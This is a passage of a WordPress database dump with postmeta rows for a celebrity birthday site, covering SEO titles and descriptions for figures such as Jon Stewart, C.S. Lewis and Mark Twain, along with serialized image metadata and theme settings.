Stewart'),(3501,569,'_yoast_wpseo_title','Jon Stewart (1962 – Present)'),(3502,569,'_yoast_wpseo_metadesc','Jon Stewart is an excellent talk show host who is popular for being on the The Daily Show. He\'s had a long career that has seen a lot of success, and continues to see it.'),(3503,569,'_yoast_wpseo_linkdex','75'),(3504,569,'post_views_count','34'),(3505,570,'_edit_lock','1479995895:2'),(3506,570,'_edit_last','3'),(3507,570,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(3508,570,'slide_template','default'),(3509,570,'ct_mb_post_bg_color','#42586a'),(3510,570,'_yoast_wpseo_focuskw','C.S. Lewis'),(3511,570,'_yoast_wpseo_title','C.S. Lewis (1898 – 1963)'),(3512,570,'_yoast_wpseo_metadesc','C.S. Lewis is the famous author of The Chronicles of Narnia book series. His books have seen many adaptions made over the years and are still remembered today.'),(3513,570,'_yoast_wpseo_linkdex','78'),(3514,570,'post_views_count','6'),(3515,572,'_edit_lock','1479870928:2'),(3516,572,'_edit_last','2'),(3517,572,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(3518,572,'slide_template','default'),(3519,572,'ct_mb_post_bg_color','#42586a'),(3520,572,'_yoast_wpseo_focuskw','Mark Twain'),(3521,572,'_yoast_wpseo_title','Mark Twain (1835 – 1910)'),(3522,572,'_yoast_wpseo_metadesc','Mark Twain was a man who saw a lot of highs and lows in his life. From seeing the death of his loved ones to becoming bitter in his later years.'),(3523,572,'_yoast_wpseo_linkdex','83'),(3524,572,'post_views_count','75'),(3525,575,'_wp_attached_file','2015/10/Pablo-Picasso-birthday.jpg'),(3526,575,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:400;s:4:\"file\";s:34:\"2015/10/Pablo-Picasso-birthday.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:32:\"Pablo-Picasso-birthday-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:33:\"Pablo-Picasso-birthday-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-534x400.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-696x398.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:34:\"Pablo-Picasso-birthday-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3527,575,'_wp_attachment_image_alt','Pablo Picasso birthday'),(3528,496,'_thumbnail_id','575'),(3531,577,'_wp_attached_file','2015/10/hillary-clinton-birthday.jpg'),(3532,577,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:400;s:4:\"file\";s:36:\"2015/10/hillary-clinton-birthday.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:34:\"hillary-clinton-birthday-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:35:\"hillary-clinton-birthday-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-534x400.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-696x398.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:36:\"hillary-clinton-birthday-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3533,577,'_wp_attachment_image_alt','hillary clinton birthday'),(3534,497,'_thumbnail_id','577'),(3537,453,'td_mega_menu_cat',''),(3538,453,'td_mega_menu_page_id',''),(3539,454,'td_mega_menu_cat',''),(3540,454,'td_mega_menu_page_id',''),(3541,455,'td_mega_menu_cat',''),(3542,455,'td_mega_menu_page_id',''),(3543,457,'td_mega_menu_cat',''),(3544,457,'td_mega_menu_page_id',''),(3547,459,'td_mega_menu_cat',''),(3548,459,'td_mega_menu_page_id',''),(3549,460,'td_mega_menu_cat',''),(3550,460,'td_mega_menu_page_id',''),(3551,464,'td_mega_menu_cat',''),(3552,464,'td_mega_menu_page_id',''),(3553,466,'td_mega_menu_cat',''),(3554,466,'td_mega_menu_page_id',''),(3555,194,'td_page','a:1:{s:19:\"td_sidebar_position\";s:10:\"no_sidebar\";}'),(3556,188,'td_page','a:1:{s:19:\"td_sidebar_position\";s:10:\"no_sidebar\";}'),(3557,380,'td_page','a:1:{s:19:\"td_sidebar_position\";s:10:\"no_sidebar\";}'),(3558,380,'td_homepage_loop','a:1:{s:5:\"limit\";s:2:\"10\";}'),(3559,579,'_wp_attached_file','2015/11/Jon_stewart-e1479995906460.jpg'),(3560,579,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:660;s:6:\"height\";i:440;s:4:\"file\";s:38:\"2015/11/Jon_stewart-e1479995906460.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:36:\"Jon_stewart-e1479995906460-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:37:\"Jon_stewart-e1479995906460-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-534x440.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-660x385.jpg\";s:5:\"width\";i:660;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:38:\"Jon_stewart-e1479995906460-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3562,569,'_yoast_wpseo_primary_category',''),(3563,569,'_yoast_wpseo_focuskw_text_input','Jon Stewart'),(3564,569,'_yoast_wpseo_content_score','60'),(3565,581,'_wp_attached_file','2015/11/Mark_Twain.jpg'),(3566,581,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:22:\"2015/11/Mark_Twain.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Mark_Twain-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Mark_Twain-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Mark_Twain-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-696x696.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:696;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:23:\"Mark_Twain-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:24:\"Mark_Twain-1068x1068.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:1068;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Mark_Twain-420x420.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3568,572,'_yoast_wpseo_primary_category',''),(3569,572,'_yoast_wpseo_focuskw_text_input','Mark Twain'),(3570,572,'_yoast_wpseo_content_score','90'),(3571,569,'_thumbnail_id','579'),(3574,572,'_thumbnail_id','581'),(3575,584,'_wp_attached_file','2015/11/220px-C.s.lewis3_.jpg'),(3576,584,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:220;s:6:\"height\";i:318;s:4:\"file\";s:29:\"2015/11/220px-C.s.lewis3_.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"220px-C.s.lewis3_-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"220px-C.s.lewis3_-208x300.jpg\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"220px-C.s.lewis3_-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"220px-C.s.lewis3_-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:29:\"220px-C.s.lewis3_-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:29:\"220px-C.s.lewis3_-220x198.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:29:\"220px-C.s.lewis3_-220x160.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:29:\"220px-C.s.lewis3_-220x235.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:29:\"220px-C.s.lewis3_-220x220.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:29:\"220px-C.s.lewis3_-220x261.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3577,570,'_yoast_wpseo_focuskw_text_input','C.S. Lewis'),(3578,570,'_yoast_wpseo_content_score','30'),(3579,586,'_wp_attached_file','2015/11/jimi-hendrix1.jpg'),(3580,586,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2015/11/jimi-hendrix1.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"jimi-hendrix1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"jimi-hendrix1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"jimi-hendrix1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-696x522.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"jimi-hendrix1-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:26:\"jimi-hendrix1-1068x801.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:801;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"jimi-hendrix1-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3581,568,'_yoast_wpseo_focuskw_text_input','Jimi Hendrix'),(3582,568,'_yoast_wpseo_content_score','60'),(3583,588,'_wp_attached_file','2015/11/tina-turner.jpg'),(3584,588,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1473;s:6:\"height\";i:1324;s:4:\"file\";s:23:\"2015/11/tina-turner.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"tina-turner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"tina-turner-300x270.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"tina-turner-768x690.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:690;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"tina-turner-1024x920.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:920;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8: